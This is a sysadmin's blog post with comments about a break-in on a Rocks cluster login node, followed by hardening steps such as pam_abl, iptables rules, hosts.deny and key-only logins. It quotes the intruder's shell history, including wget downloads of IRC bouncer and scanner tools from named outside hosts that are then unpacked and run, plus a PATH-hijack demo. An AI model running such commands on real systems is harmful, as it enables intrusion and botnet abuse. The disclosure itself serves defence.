Hardening security on your Rocks system(s)

We now understand the attack vector. It turned out to be simple, and some of the changes we have made have now closed that door. It was a pretty simple door, but still worth noting. BTW: some people don’t like early disclosure of exploits. Since posting, I have heard from ~6 people (off the Rocks list) that they have seen similar attacks attempted.

The entry point was via a shared user account. Once this account was compromised, our new friend from Romania started working. We found this (cluster name changed to protect the compromised):

[root@xxxxx user]# ls -alFt | head -10
total 2980
drwxr-xr-x   6 root root       0 Oct 23 14:40 ../
drwx------   7 user user    4096 Oct 23 12:05 ./
drwxr-xr-x   2 user user    4096 Oct 23 12:05 bodo-scan/
drwxr-xr-x   2 user user    4096 Oct 23 12:05 chyna/
-rw-------   1 user user    7894 Oct 23 00:18 .bash_history 

and in these directories, we found

[root@xxxxx user]# ls bodo-scan/ chyna
112.pscan.22  a   a3    common       go.sh    pass_file    pico    ss
93.pscan.22   a2  auto  gen-pass.sh  mfu.txt  pass_filees  pscan2  start

152,.2.pscan.22  72.20.pscan.22  core      pass1          pscan2  vuln.txt
152.2.pscan.22   79.36.pscan.22  go.sh     pass1.save     screen
189.81.pscan.22  a               help.txt  pass_file      ss
61.168.pscan.22  checkroot       mass      pass_file.bak  usage

Hmmm. Reports from the network monitoring team indicated that this unit was scanning at a massive rate. It knocked portions of this university’s network (so we were told) off the net for a few hours last night.

Ok, we see suspicious files in an account that should not have been shared, but was. Anything more concrete?


These folks left their .bash_history chock full of what they did. They were obviously trying to p0wn the machine. It didn’t start to get interesting until here:

nano vuln.txt
./unix 129.219
cd /dev/shm

ok … they have my attention. Here is where it gets exciting. Remember that little kernel vulnerability from a few months ago? The one where you could force a system call to fail in a particular way, and get root? The one where, if you have not patched your kernel in a few months you are at risk?

They did try that as far as I can tell.

This was a patched system: we had gone so far as to replace the standard ssh daemon with an updated one reflecting the latest security and bug patches, and to remove all extraneous packages (there are still a few too many, and we need to pull them off). It appears they gave up on trying to crack that system, and instead tried to turn it into a scanner. At this they were successful.

/start 66.233
./start 66.234
./start 66.235
./start 66.236
./start 66.239
./start 66.240
./start 66.246
./start 66.247 


chmod +x *
./a 152,.2
./a 152.2
./a 79.33
./a 79.34
./a 79.35
./a 79.36
./a 82.114
./a 82.115
./a 61.168
./a 189.81
./a 67.233
./a 61.168
./a 72.20 

Not to mention their attempts to set up bots on non-secure ports:

cd ..
mkdir "  "
cd "  "
wget wget
ps x
cd /var/tmp
ls -a
cd /tmp
ls -a
cd team2
nano vuln.txt
cd /dev/shm 

Notice the name of the directory they made. Look closely at the mkdir.

Now if this isn’t bad enough, look at this:

mkdir " "
cd " "
wget members.lycos.co.uk/sonnyremote/psy.tar
tar xzvf psy.tar
rm -rf psy.tar
cd .bash
export PATH=:.
ps -ax 

They are still trying to gain root.

And pulling down tool after tool to do so.

Finally they went for broke, pulling down tools from a number of sites:

wget http://Linux-Help.clan.su/download/psybnc-linux.tgz
wget http://nasaundernet.is-the-boss.com/psybnc-linux.tgz
tar zxvf psybnc-linux.tgz
cd psybnc-linux ; cd psybnc
mv psybnc bash
chmod +x * ; sh
PATH=:$PATH ; bash
PATH=:$PATH ; bash 

and finished up with simple UDP traffic generators, which I won’t replicate here.

Ok, what lessons can we learn from this, and how can we harden the systems? My initial guess of a root exploit was not fully correct. They tried it, didn’t get there, and achieved secondary goals.

Their goals appear to be, in approximate order:

1) p0wn the machine (take complete control of it)

2) if #1 isn’t possible, then try to turn it into a bot of some sort

3) if #2 isn’t possible, then try to turn it into a traffic generator and take down nets.

4) in all cases, prep for the next attack by establishing multiple possible attack vectors: poison other ~/.ssh/authorized_keys files, ~/.rhosts files, ~/.shosts files, …

I am guessing I am approximately right, and I am sure that this can be refined quite a bit.

So how do we stop this? I’ll talk in the context of Rocks cluster(s), but it applies to all (Linux) clusters.

User policy:

1) [mandate] no sharing of accounts. This is verboten. It is easy enough to socially engineer someone into running something they shouldn’t. See all those nice “export PATH=…” lines? What happens if root logs into that account, with the path set to search the local (compromised) directory before the normal path? Or an end user does?
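To see why those PATH lines matter, here is a minimal, self-contained sketch (all paths and names are illustrative, not taken from the compromised system):

```shell
# Demonstrate how a leading "." in PATH lets a planted script shadow a
# real command. Run only in a scratch directory.
mkdir -p /tmp/trojan-demo
printf '#!/bin/sh\necho "trojan ls ran"\n' > /tmp/trojan-demo/ls
chmod +x /tmp/trojan-demo/ls

# A victim whose PATH searches "." first now executes the attacker's "ls":
( cd /tmp/trojan-demo && PATH=".:$PATH" /bin/sh -c ls )
# prints: trojan ls ran
```

Any privileged user who cd’s into such a directory with that PATH runs the attacker’s code instead of the system binary.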

2) [suggestion] consider turning off suid on user-writable mounts (e.g. use the “nosuid” mount option). This should not impact any users. If it does, you need to speak with them about why they need suid access, and see if another method will work. This is, curiously, related to the original attack-vector assumption, based upon a previous compromise of this system.
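As a sketch, the relevant /etc/fstab entry for a user-writable filesystem might look like this (device and mount point are hypothetical):

```
# /etc/fstab: add nosuid (and often nodev) to user-writable filesystems
/dev/sda3    /home    ext3    defaults,nosuid,nodev    1 2
```

An already-mounted filesystem can be switched over in place with `mount -o remount,nosuid /home`.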


System configuration:

1) [strongly urged] use pam_abl. This provides support in the PAM layer for banning hosts and users based upon failed logins. It is similar to fail2ban, with the advantage that, since it works at the PAM layer, it can protect ftp as well as ssh and any other login service that uses PAM.

You need to create an /etc/security/pam_abl.conf file and add an entry to the /etc/pam.d/ service file where you want to use it. For example:

# /etc/security/pam_abl.conf
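The file’s contents were not shown above; a minimal sketch, using typical values from the pam_abl documentation (database paths and rule thresholds are examples, tune them to taste):

```
# example values, not from the original system
host_db=/var/lib/abl/hosts.db
host_purge=2d
host_rule=*:10/1h,30/1d
user_db=/var/lib/abl/users.db
user_purge=2d
user_rule=!root:10/1h,30/1d
```

Here a host or user is blocked after 10 failures in an hour or 30 in a day, and records are purged after two days.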

and your /etc/pam.d/sshd file should include this line after the pam_env line:

auth required /lib/security/pam_abl.so config=/etc/security/pam_abl.conf

2) [strongly urged] for any nodes with public IP addresses, limit the range of destination ports using iptables. Someone wants to ssh or wget or ftp a file? Sure. Disable most other public access. I am not a fan of iptables on compute nodes, but when we commission these as login nodes, and purposefully remove as much as possible, this configuration is definitely advised.

Here is what a good /etc/sysconfig/iptables file looks like for these nodes:


# Preamble
-A FORWARD -i eth1 -o eth0 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -j ACCEPT
-A INPUT -i eth0 -j ACCEPT
-A INPUT -i lo -j ACCEPT

# Allow these ports
-A INPUT -m state --state NEW -p tcp --dport ssh -j ACCEPT
# Uncomment the lines below to activate web access to the cluster.
-A INPUT -m state --state NEW -p tcp --dport https -j ACCEPT
-A INPUT -m state --state NEW -p tcp --dport www -j ACCEPT
-A INPUT -i eth0 -p udp --dport 53 -j ACCEPT

# Standard rules
-A INPUT -p icmp --icmp-type any -j ACCEPT
# Uncomment the line below to log incoming packets.
#-A INPUT -j LOG --log-prefix "Unknown packet:"

# Deny section
-A INPUT -p udp --dport 0:1024 -j REJECT
-A INPUT -p tcp --dport 0:1024 -j REJECT
# Block incoming ganglia packets on public interface.
-A INPUT -p udp --dport 8649 -j REJECT

# specific rejects for security
-A INPUT -p tcp --dport 3306 -i eth1 -j REJECT
-A INPUT -p tcp --dport 111 -i eth1 -j REJECT
-A INPUT -p udp --dport 111 -i eth1 -j REJECT
-A INPUT -p tcp --dport 25 -i eth1 -j REJECT
-A INPUT -p tcp --dport 199 -i eth1 -j REJECT
-A INPUT -p tcp --dport 536 -i eth1 -j REJECT
-A INPUT -p tcp --dport 852 -i eth1 -j REJECT
-A INPUT -p tcp --dport 873 -i eth1 -j REJECT
-A INPUT -p tcp --dport 910 -i eth1 -j REJECT
-A INPUT -p tcp --dport 2049 -i eth1 -j REJECT
-A INPUT -p udp --dport 2049 -i eth1 -j REJECT
-A INPUT -p tcp --dport 32774 -i eth1 -j REJECT

# For a draconian "drop-all" firewall, uncomment the line below.
#-A INPUT -j DROP

Could be improved.

3) [strongly urged] for any nodes with public IP addresses, make sure you have /etc/hosts.deny and /etc/hosts.allow set up appropriately. Actively deny everything by default, and only allow what you need.

Here is a good /etc/hosts.deny

# hosts.deny This file describes the names of the hosts which are
# *not* allowed to use the local INET services, as decided
# by the ‘/usr/sbin/tcpd’ server.
# The portmap line is redundant, but it is left to remind you that
# the new secure portmap uses hosts.deny and hosts.allow. In particular
# you should know that NFS uses portmap!

portmap: ALL
http: ALL

Here is a good /etc/hosts.allow
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the ‘/usr/sbin/tcpd’ server.

sshd: ALL

4) [strongly recommended] set up minimal sudo access to handle specific, occasional end-user needs. Do not let users run as root. There is no reason to.
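As a sketch of “minimal sudo”, a sudoers fragment (edit with visudo) granting one hypothetical group a couple of specific commands, and nothing else, might look like:

```
# /etc/sudoers fragment (group name and commands are illustrative)
# Let members of the "ops" group restart the batch system and read logs:
%ops  ALL = (root) /sbin/service pbs restart, /usr/bin/tail /var/log/messages
# No blanket "ALL = ALL" entries; every permitted command is enumerated.
```

The point is enumeration: each command a user may run as root is listed explicitly, so a compromised account cannot parlay sudo into a full root shell.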

5) [strongly recommended] pro-active login monitoring. Is who is on your system supposed to be who is on your system? If you have 10 users spread out all over, this is hard. If you have 20, it is very hard. You should try to get users to tell you where they will be connecting from, so that you can check whether a login really was them. A login gone wrong can do great damage.
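A crude sketch of this kind of check: keep a list of “user origin” pairs you expect, and flag anything else. The file name and entries below are hypothetical.

```shell
# check_login USER HOST FILE: succeed if the pair appears in the whitelist
check_login() {
    grep -q "^$1 $2\$" "$3"
}

# Hypothetical whitelist of expected login origins
printf 'alice 10.0.0.5\nbob 192.168.1.9\n' > /tmp/expected_logins

check_login alice 10.0.0.5 /tmp/expected_logins && echo "alice: expected"
check_login alice 1.2.3.4  /tmp/expected_logins || echo "alice from 1.2.3.4: investigate"
```

In practice you would feed this from `last -a` or `who` output on a cron job and mail yourself the mismatches.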

6) [strongly recommended] no passwords. Keys for all, and for all, keys. Keyloggers can’t grab passwords that are never typed. It is possible (and not too hard) to coax PuTTY into using keys. Mac OS X can do this as well, since its ssh and the ssh in Linux are quite similar. Keys should be refreshed periodically, and the contents of ~/.ssh/authorized_keys should be flushed and controlled.
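A sketch of the client-side key workflow (file names and the hostname are illustrative; in real use, protect the key with a passphrase and use ssh-agent, rather than the empty passphrase used here so the example runs non-interactively):

```shell
# Generate an RSA keypair (empty passphrase only for this demo)
rm -f /tmp/demo_key /tmp/demo_key.pub
ssh-keygen -q -t rsa -b 2048 -f /tmp/demo_key -N ""

# Install the public half on the server (hostname is hypothetical):
#   ssh-copy-id -i /tmp/demo_key.pub user@frontend.example.org
# Then, in the server's /etc/ssh/sshd_config, disable password logins:
#   PasswordAuthentication no
ls /tmp/demo_key /tmp/demo_key.pub
```

Once every user is on keys, turning off PasswordAuthentication removes the brute-force surface those pscan tools were hammering.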

There are a few other things I can probably think of, but this is it for the moment for this post. We are going to implement other techniques for some of our customers which should provide them even better protection, even against errant port scanners and other annoying crackers.

Regardless of that, please do patch your systems. Especially if your kernel is more than a few months old.



9 thoughts on “Hardening security on your Rocks system(s)”

  1. As far as keys go, we like to use the following sshd_config option for the frontend:

    AuthorizedKeysFile /etc/ssh/users/%u.pub

    Then the normal ~/.ssh/authorized_keys for all other nodes (who cares if it is only used for private vlan access control).

    Then install only the external keys we bless (one per user/person) on the frontend in a root-controlled directory. This prevents people from getting in once, grabbing the Rocks-created passphrase-less key, and storing it for later, then getting in anytime in the future.

  2. Good idea, thanks for pointing this out.

    We have some interesting ideas we are testing. If they work, we will put up some info on them.

  3. BTW: A few years ago, I wrote danger. This was supposed to be something similar to DenyHosts, and some folks are still using it. We use it to generate input for /etc/hosts.deny. I like pam_abl a bit better than danger, but people are welcome to use/extend it.

  4. I should also point out that Rocks should not be harder to keep updated than Red Hat in general. We have successfully used yum with some surgical precision to update out-of-date packages.

    The kernels (the exposed ones) are the big ones, followed closely by the other security patches.

  5. A lot of my qualms with keeping Rocks up to date are actually with Red Hat. However, I *really* don’t like the direction the Rocks devs have gone in moving their software/deps out of the tree (everything from ls to mysqld). A fork of a fork will have significantly fewer eyes on it than the original. Since Rocks is a cluster distribution/integration (likely running a lot of expensive equipment), it is a high-value target for the bad guys. That combo is not good for security.

    BTW, we use cobbler/koan for one cluster and it seems to do a lot of the same things Rocks does, but plays nice with yum. There is even talk of debian-based distribution support. It doesn’t have some of the Rocks niceties like the torrent-based installer, but if yum update works, maybe that would be unnecessary? I only run medium-sized clusters (< 300 nodes), so maybe it would only benefit the smaller installations like mine. In any case, it’s worth checking out if you haven’t already.

  6. Oh ya, on the list you mentioned the attackers changed out the kernel. We prevent kernel-based rootkits on our other machines using paravirtualization (mostly xen but we’re hoping kvm will get there soon). It seems to work well since the domU’s kernel is loaded from the dom0. So an attacker that has root on the domU can’t do much with the kernel (but perhaps load kernel modules if enabled). I’ve always wanted this kind of setup for my Rocks frontends.

  7. Well, I can understand some of their issues. Way early on, they effectively over-rode useradd and other tools. This separate tree was largely used for this.

    For some of our software, we have been blown away at how crappy some of the distro tools are. Specifically their perl builds, and in the past the apache builds. The latter have improved (maybe I am just too ubuntu focused; apache2 doesn’t suck there). I don’t blame them for wanting to preserve what they do via the tree. I would prefer as little as possible there, but we have found, as we build our kit, that something in the distro is, well, not quite right. After a while, we have a large tree.

    This bugs me too. But the alternative is, sometimes, code that doesn’t run.

    So I don’t fault them for it. I understand it. It does make sense for some tools they need.

    This said, I think they should get away from mysql. And anaconda gives me fits outside of Rocks. I’ve taken to defensive installations: minimal on the head node and minimal rolls, with our finishing scripts or other mechanisms to do the rest of the heavy lifting when we use Rocks. As we are using other things as well, our stuff has to be consistent across systems.

    But the out-of-distro-tree is ok for some of the tools. One thing we do is to use alternative ports for different things (databases, web servers, etc), so we don’t have to interfere with the distro tools.

  8. The problem with Rocks is that updating (patching) the cluster is not workable. Surprisingly, the team is least concerned about updates. This is the end result of that bad design decision.

    Which is THE reason I stopped using Rocks and moved to xCAT (v2 is OSS)

Comments are closed.